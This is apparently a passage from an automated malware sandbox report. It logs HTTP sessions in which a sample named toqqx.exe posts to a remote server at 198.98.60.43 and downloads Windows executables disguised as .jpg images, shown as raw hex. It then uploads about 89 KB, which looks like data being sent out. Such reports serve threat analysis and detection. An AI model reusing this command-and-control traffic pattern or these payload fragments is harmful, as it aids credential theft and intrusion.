7d 03 00 00 04 2b 00 2a 00 00 1b 30 03 00 29 00 00 00 01 00 00 11 02 7b 01 00 00 04 15 2d 08 26 06 1f fd 2e 09 2b 03 0a 2b f6 06 17 33 10 00 de 0d 02 15 2d 02 26 dc 28 04 00 00 06 2b f8 2a 00 00 00 01 10 00 00 02 00 19 00 02 1b 00 0d 00 00 00 00 1b 30 05 00 11 01 00 00 02 00 00 11 02 7b 01 00 00 04 16 2c 06 26 07 2c 16 2b 03 0b 2b f8 07 17 2e 73 16 18 2d 06 26 dd ef 00 00 00 0a 2b f8 02 15 1c 2d 2f 26 26 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 04 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 86 00 00 00 7d 01 00 00 04 2b cc 02 02 7b 08 00 00 04 6f 03 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 a8 ee de 51 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7d 06 00 00 04 02 7b 08 00 00 04 6f 1e 00 00 06 3a 71 ff ff ff 02 28 04 00 00 06 2b 08 02 28 04 00 00 06 de 12 02 14
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL)`jJ @ @tW,G8 H.texti j `.rsrc,GHl@@.reloc@BHc%W0F0.(-&&(o-&&+}+}+*0){-&.++3-&(+*0{,&,++.s-&+-/&&}}so}}8}+{o}{}}}{Y}{-+H{{X{X Q{Xa}}{o:q(+(


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 198.98.60.43 | 80 | C:\Users\user\AppData\Local\Temp\toqqx.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 21:35:04.267096996 CEST | 266 | OUT | POST /6.jpg HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 198.98.60.43
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
Data Ascii: --1BEF0A57BE110FD467A--
May 4, 2021 21:35:04.394546986 CEST | 268 | IN | HTTP/1.1 200 OK
Date: Tue, 04 May 2021 19:35:04 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
Last-Modified: Thu, 06 Jun 2019 14:01:52 GMT
ETag: "235d0-58aa827e4d400"
Accept-Ranges: bytes
Content-Length: 144848
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 
00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l$JOJOJOuOJO?oKNJO?oINJO?oONJO?oNNJOmKNJO-nKNJOKO~JO-nNNJO-nJNJO-nOJO-nHNJORichJOPELb["!bP@0x@`T(@l.text `.rdataDF@@.data @.rsrcx0@@.reloc`@@B
May 4, 2021 21:35:04.814322948 CEST | 421 | OUT | POST /1.jpg HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 198.98.60.43
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
Data Ascii: --1BEF0A57BE110FD467A--
May 4, 2021 21:35:04.942370892 CEST | 422 | IN | HTTP/1.1 200 OK
Date: Tue, 04 May 2021 19:35:04 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
Last-Modified: Mon, 07 Aug 2017 05:52:20 GMT
ETag: "9d9d8-5562373312d00"
Accept-Ranges: bytes
Content-Length: 645592
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00 00 38 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 37 37 00 00 00 00 00 94 0b 00 00 00 c0 08 00 00 0c 00 00 00 46 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 39 00 00 00 00 00 04 05 00 00 00 d0 08 00 00 06 00 00 00 52 08 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=Sv?!X` 8 L'p.text`0`.data@@.rdata$@@@.bss@.edata@0@.idataL@0.CRT@0.tls @0.reloc'(@0B/4`0@@B/19@@B/35MP@B/51`C`D@B/638@B/77F@B/89R
May 4, 2021 21:35:06.094985962 CEST | 1105 | OUT | POST /2.jpg HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 198.98.60.43
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
Data Ascii: --1BEF0A57BE110FD467A--
May 4, 2021 21:35:06.222722054 CEST | 1107 | IN | HTTP/1.1 200 OK
Date: Tue, 04 May 2021 19:35:06 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
Last-Modified: Thu, 06 Jun 2019 14:00:58 GMT
ETag: "519d0-58aa824acda80"
Accept-Ranges: bytes
Content-Length: 334288
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/jpeg
                                                                May 4, 2021 21:35:07.566735983 CEST | 1457 | OUT | POST /3.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:07.694489002 CEST | 1459 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:07 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:01:20 GMT
                                                                ETag: "217d0-58aa825fc8c00"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 137168
                                                                Keep-Alive: timeout=5, max=97
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                May 4, 2021 21:35:07.735249043 CEST | 1603 | OUT | POST /4.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:07.863147020 CEST | 1604 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:07 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:01:30 GMT
                                                                ETag: "6b738-58aa826952280"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 440120
                                                                Keep-Alive: timeout=5, max=96
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                May 4, 2021 21:35:08.911489964 CEST | 2070 | OUT | POST /5.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:09.039388895 CEST | 2072 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:08 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:01:44 GMT
                                                                ETag: "1303d0-58aa8276ac200"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1246160
                                                                Keep-Alive: timeout=5, max=95
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                May 4, 2021 21:35:12.461482048 CEST | 3431 | OUT | POST /7.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:12.589014053 CEST | 3488 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:12 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:02:02 GMT
                                                                ETag: "14748-58aa8287d6a80"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 83784
                                                                Keep-Alive: timeout=5, max=94
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                May 4, 2021 21:35:14.873209953 CEST | 4632 | OUT | POST /main.php HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:15.003655910 CEST | 4659 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:14 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                X-Powered-By: PHP/7.2.24
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=93
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                May 4, 2021 21:35:15.744862080 CEST | 5273 | OUT | POST / HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 89104
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                May 4, 2021 21:35:16.350888014 CEST | 5760 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:15 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                X-Powered-By: PHP/7.2.24
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=92
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                2 | 192.168.2.22 | 49167 | 198.98.60.43 | 80 | C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                May 4, 2021 21:35:12.091762066 CEST | 3388 | OUT | POST /6.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:12.219115019 CEST | 3390 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:12 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:01:52 GMT
                                                                ETag: "235d0-58aa827e4d400"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 144848
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                May 4, 2021 21:35:12.622164011 CEST | 3555 | OUT | POST /1.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:12.750000954 CEST | 3585 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:12 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Mon, 07 Aug 2017 05:52:20 GMT
                                                                ETag: "9d9d8-5562373312d00"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 645592
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 
